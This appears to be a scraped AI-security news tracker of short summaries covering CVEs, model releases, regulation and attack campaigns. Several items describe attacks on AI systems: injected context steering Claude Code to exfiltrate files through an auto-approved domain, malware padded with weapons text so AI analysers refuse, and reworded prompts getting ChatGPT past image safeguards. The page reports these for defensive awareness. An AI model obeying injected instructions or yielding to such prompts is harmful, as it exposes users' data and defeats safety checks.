All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Attackers are exploiting trusted platforms like Google Ads, GitLab, and Claude to deliver malware by impersonating popular AI developer tools and using ClickFix social engineering attacks (tricking users into manually running malicious commands). Over a seven-week campaign, threat actors created fake pages on legitimate services and used Google Ads to direct more than 2,000 victims to malicious sites where they were convinced to copy and paste harmful PowerShell or terminal commands (code that executes instructions). The campaign succeeded because victims trusted these platforms and assumed instructions from AI tools were reliable, making the attacks harder to detect than traditional malware campaigns.
This article reports on several high-level security hiring announcements in 2026, where companies are appointing CISOs (chief information security officers, executives responsible for protecting a company's information systems). The appointments reflect companies' growing focus on security as threats evolve, with new leaders coming from military backgrounds, previous CISO roles, and security-focused companies.
AI-powered security operations centers (SOCs, where cybersecurity teams monitor and respond to threats) are automating many traditional analyst tasks, starting with alert triage and investigation. This shift will create new job roles such as security data engineers, AI security agent orchestrators, and AI model trainers, where humans will focus on preparing data, managing AI agent systems, and continuously updating AI models rather than doing routine alert monitoring.
The EU is developing 'Shield-6G', a security framework that uses AI threat detection (automated systems that recognize harmful activity), digital twins (virtual copies of networks used for testing), and honeypots (fake systems designed to catch attackers) to help telecommunications carriers protect next-generation 6G networks from future threats.
Noam Shazeer, a senior Google engineer and co-lead of the Gemini AI models (Google's large language model system), has left the company to join OpenAI (the company behind ChatGPT). This departure highlights the competitive battle between tech companies to recruit top AI researchers and engineers.
Midjourney, known for its AI image generator, has unveiled The Midjourney Scanner, a hardware product that uses ultrasound technology (sound waves to create images of the body's interior) with a ring of sensors to capture full-body scans showing muscle, fat, bone, and organs. The company plans to build a spa in San Francisco where users could get these scans, which the CEO claims could match MRI (magnetic resonance imaging, a medical scanning technique) quality.
OpenAI is testing a new subscription service called 'ChatGPT for Science' that would provide specialized AI capabilities for scientific research, similar to how it previously created GPT-Rosalind (a specialized model built on GPT-5.5 architecture for life sciences research). The service would likely be restricted to verified research institutions and universities rather than being available to all users, and it is expected to be announced within the coming weeks.
Z.ai released GLM-5.2, a 753-billion parameter text-only open weights LLM (large language model, a type of AI trained on text) under an MIT license on June 16th, 2026. It features a 1-million token context window (the amount of text it can consider at once) and ranks as the top open weights model on independent benchmarks, though it uses significantly more output tokens per task than competing models. The model performs well on web development coding tasks but has shown mixed results in creative image generation tasks compared to its predecessor.
A vulnerability (CVE-2026-12530) was found in the AWS Bedrock AgentCore Python SDK's install_packages() method, which failed to properly block dangerous characters in package names before running them as shell commands. This allowed attackers to use flags like '--index-url' to redirect package downloads to fake servers or '-r' to read files from the sandbox system. Versions 1.1.3 through 1.6.0 are affected.
Langflow versions before 1.9.1 allow anyone with network access to upload unlimited amounts of data to the server without logging in, which can exhaust disk space and cause the service to stop working (DoS, or denial-of-service). Additionally, the server reveals the exact file path where uploads are stored, giving attackers information that could help them chain together multiple attacks.
LangChain4j's MariaDB and pgvector embedding stores have a SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL code into a query) caused by improperly escaping metadata filter keys before putting them into SQL queries. An attacker who can control the filter keys in search or remove operations could inject arbitrary SQL to steal data, cause denial of service, or delete rows from the database.
The Trump administration ordered Anthropic to block access to its AI models (Fable 5 and Mythos 5) for all foreign nationals, citing national security as the reason. This marks the first time US export controls have been used to restrict access to an AI model in this way, and the government has not publicly explained the legal basis for the order.
Claude Code had a security flaw where the domain huggingface.co was automatically approved for the WebFetch tool (a feature that lets AI systems fetch data from the internet), allowing attackers to trick Claude into making web requests to attacker-controlled files and secretly stealing data like files or environment variables without user permission. An attacker would need to first inject malicious content into Claude's context (the information it's working with) to exploit this vulnerability.
A malware developer is embedding forbidden text about nuclear and biological weapons in JavaScript spyware to prevent AI analysis. The malware hides real code after a large comment block containing policy-triggering content, which tricks AI systems into refusing to analyze the file or getting confused before they can identify the actual malicious code.
ChatGPT has improved its ability to help with health questions through a new model called GPT-5.5 Instant, which better recognizes when urgent care is needed, explains uncertainty honestly, and provides clearer information. The improvements were measured using physician-led evaluations (HealthBench, a set of tests that assess health response quality) and real-world usage data, showing a 71% reduction in factuality issues over two months. GPT-5.5 Instant is available free to all ChatGPT users and performs similarly to OpenAI's most advanced models on health-related tasks.
AI systems challenge traditional cybersecurity because they behave unpredictably, unlike the deterministic (consistent and predictable) systems that security programs were designed around. Traditional security approaches focused on preventing attacks before systems go live, but AI agents make dynamic decisions and interact with external tools in ways developers can't fully predict, meaning security risks emerge at runtime (while systems are actively running) rather than being preventable beforehand. Additionally, AI-assisted development tools are accelerating code production, compressing the time security teams have to review and understand what enters production.
Researchers used OpenAI o3 Deep Research, an AI reasoning model, to re-analyze 376 previously unsolved rare genetic disease cases by connecting clinical data, genetic variants, and scientific literature into evidence-based explanations for human experts to review. After specialist evaluation and clinical confirmation, the AI-assisted workflow helped establish new diagnoses in 18 cases (4.8% additional diagnostic yield), with the model generating hypotheses rather than making medical decisions itself. This demonstrates how periodic AI-assisted reanalysis could help scale the process of solving rare disease cases as medical knowledge evolves.
Splunk Enterprise has a critical security flaw where a PostgreSQL sidecar service endpoint (a supporting service that handles database connections) doesn't require authentication (proof of identity), allowing an attacker without credentials to create or delete arbitrary files. This vulnerability is currently being exploited in real attacks in the wild.
Researchers at AI security startup Mindgard discovered that ChatGPT can be manipulated using modified prompts (instructions given to an AI) to generate graphic images containing violence and sexual content, even when the prompt doesn't explicitly request such material. After the BBC contacted OpenAI, the company stated it had added safeguards to prevent this, though the researchers found that further small changes to the prompt still produced concerning content.
Fix: OpenAI said it had 'introduced additional safeguards against this type of prompt' and stated it has 'multiple layers of protection to prevent users making content which breaches its terms and conditions.' The company also continues to 'monitor and roll out additional mitigating protections that encourage the model not to generate images in response to the prompt.'
BBC TechnologyMicrosoft created MDASH, an AI-powered system that uses multiple specialized AI agents to find and help fix software vulnerabilities (security flaws) automatically across complex systems like Windows and Azure. Rather than waiting for scheduled security reviews, MDASH integrates into developers' existing tools to discover and validate bugs continuously as code is written, giving security teams deeper analysis coverage than manual review alone.
Fix: Upgrade to Langflow version 1.9.1 or later. The fix adds authentication requirements to the upload endpoint (users must log in and own the flow), enforces file size limits (returns HTTP 413 if exceeded), and only reveals file paths to authenticated flow owners.
GitHub Advisory DatabaseFix: Fixed in langchain4j-mariadb and langchain4j-pgvector version 1.16.3-beta26. The patch properly escapes JSON filter keys before embedding them in SQL string literals (doubling single quotes for PostgreSQL and escaping backslash and single quote for MariaDB), escapes backslash and single quote in MariaDB string values, and validates or quotes column-mode keys as identifiers instead of concatenating them as raw SQL.
GitHub Advisory DatabaseFix: Users on standard Claude Code auto-update have received this fix already; users performing manual updates are advised to update to the latest version.
Hugging Face Security Advisories